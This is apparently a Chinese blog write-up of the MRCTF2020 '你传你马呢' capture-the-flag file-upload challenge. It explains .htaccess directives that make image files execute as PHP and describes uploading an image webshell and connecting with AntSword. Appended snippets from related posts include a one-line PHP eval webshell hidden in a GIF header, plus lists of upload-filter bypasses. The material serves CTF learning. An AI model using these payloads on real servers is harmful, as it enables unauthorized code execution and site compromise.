[MRCTF2020]你传你呢

最新推荐文章于 2024-11-12 23:14:56 发布
最新推荐文章于 2024-11-12 23:14:56 发布
阅读量583 收藏
点赞数 1
分类专栏: ctf 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/120266942
版权

0x00 初试

一开始传常规jpg,png啥的都给我封了
在这里插入图片描述
可能限制大小了??很妖 不太理解
由于buu给的链接挂了,所以也看不到源码了…

常规知识点 .htaccess文件解析漏洞

原理

.htaccess文件(或者"分布式配置文件") ,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法,即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

.htaccess重写解析规则 —>上传图片马 解析为php

语法

(推荐使用第二种)
第一种、虽然好用,但是会误伤其他正常文件,容易被发现:

<IfModule mime_module>
AddHandler php5-script .gif #在当前目录下,只针对gif文件会解析成Php代码执行
SetHandler application/x-httpd-php #在当前目录下,所有文件都会被解析成php代码执行
</IfModule>

第二种、精确控制能被解析成php代码的文件,不容易被发现:

<FilesMatch "evil.gif">
SetHandler application/x-httpd-php   #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行
AddHandler php5-script .gif #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行
</FilesMatch>

第三种、同1没太大区别:

<IfModule mime_module>
AddType application/x-httpd-php .gif
</IfModule>

参考

https://bbs.huaweicloud.com/blogs/detail/289224

0x01 复现

.htaccess
这么写更精确定位到图片马
在这里插入图片描述
上传时改一下content-type
在这里插入图片描述

上传图片马
在这里插入图片描述
在这里插入图片描述
顺序无所谓
蚁剑连一下 done!

0x02 rethink

联动复习一下SUCTF CheckIn
那一次是上传.user.ini
不适用于本题,因为它其中利用到的预加载的前提是目录下已存在正常php文件

而.htaccess是直接改了解析规则
感兴趣的可以再深入了解一下
关于.htaccess和.user.ini

https://blog.csdn.net/nigo134/article/details/119043586

BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 2079
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
web:[MRCTF2020]你你呢
sleepywin的博客
10-10 686
这里参考了大佬的wp,上一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行。上文件,先随便上一个文件看看情况。.htaccess文件的内容为。回显一片空白,说明木马上成功。构造含有一句话木马的图片上。这里用bp抓包修改类型。在根目录找到flag。
[MRCTF2020]你你马呢
Naptmn的博客
11-19 753
题目很儒雅 很委婉的告诉我们这是个文件上一句话木马 发现提示不可以 把文件名改了也不可以 发现只能上图片 于是就上了一个图片的马 发现图片的马可以 这时候我就不知道怎么做了 所以看了波wp 了解到了 .htaccess 这玩意大概用途是让别的文件以php方式执行 之后把这个东西进去就可以蚁剑连接了 记得的时候也要改类型名称 我竟然找了半天根目录在哪里 ^^ .htaccess可以看一下这个 https://blog.csdn.net/weixin_43571641/article/
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 4042
进入页面 文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4364
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 533
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
[MRCTF2020]Ezpop 1(代码审计)
weixin_45577185的博客
10-13 357
太绕了,wuwuwu~ Welcome to index.php <?php //flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 /
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9379
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
【BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5711
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]你你马呢 -wp
freerats的博客
07-07 3797
一个上框,php和phtml等不能,发现可以jpg,也可以.htaccess文件 思路就比较清晰了,.htaccess文件,然后再一张jpg图片马,就会被解析为php .htaccess无法直接上,改Content-Type: image/jpeg就可以上了,成功同时还会出现上路径,省事的很 把我们的图片马上去 upload/de7a617af67d04960a345bd95c169b14/222a8.jpg 用这个路径蚁剑连接就可以了 ...
BUUCTF:[MRCTF2020]你你呢
末初的CSDN博客
12-03 1721
https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2 文件上 文件后缀过滤的很全,常见的绕过方法php3/5/7/、phtml都不行 但是.htaccess可以上,只需要修改一下Content-Type为image/jpeg即可上 .htaccess AddType application/x-httpd-php .jpg 然后上一个含有一句话的jpg文件即可被当作p
[MRCTF2020]你你呢(文件上,.htaccess)
xlcvv的博客
04-06 4046
进来: 上一个一句话php,果然不行: 改成jpg后缀,上成功: 接着写一个.htaccess文件去把.jpg解析成.php,如下: AddType application/x-httpd-php .jpg 上失败,拿去抓包改一下content-type,注意,文件名在这里一定改成.htaccess才行: 接着连上菜刀在根目录找到flag(用菜刀一句话里参方式要是POST才行):...
BUUCTF [MRCTF2020]你你呢
墨子辰的博客
02-04 697
考点:.htaccess文件上 先上一个正常图片,发现成功上而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上。 可能有人到这里就懵了,为什么要上1.sdga,它是个神马文件类型???? 对,这里我上了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上的招式咯。 看好了 别眨眼·~~~ No.1:上 .htaccess No.2:上 .user.ini
[vulnhub] DarkHole: 1
weixin_46099552的博客
11-08 922
vulnhub - DarkHole: 1
RabbitMQ 与 PHP Swoole 实现
最新发布
学习,分享一直在路上
11-12 547
RabbitMQ 是一个开源的消息队列中间件,允许通过异步消息递来解耦应用程序的各个部分。Swoole 是一个高性能的 PHP 扩展,支持异步编程和协程,适用于构建高并发的网络服务。将 RabbitMQ 与 Swoole 结合使用,可以构建高效、可扩展的应用程序。本文将介绍如何使用 RabbitMQ 和 PHP Swoole 实现一个简单的消息队列示例。使用 Docker 快速启动 RabbitMQ 实例
Latex中给公式加边框
Angelaboy的博客
11-08 417
Latex中给公式加边框
MDBook 使用指南
qq_39517117的博客
11-12 217
介绍了 MDBook 的基本使用方法,并演示了一个简单的构建过程。
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值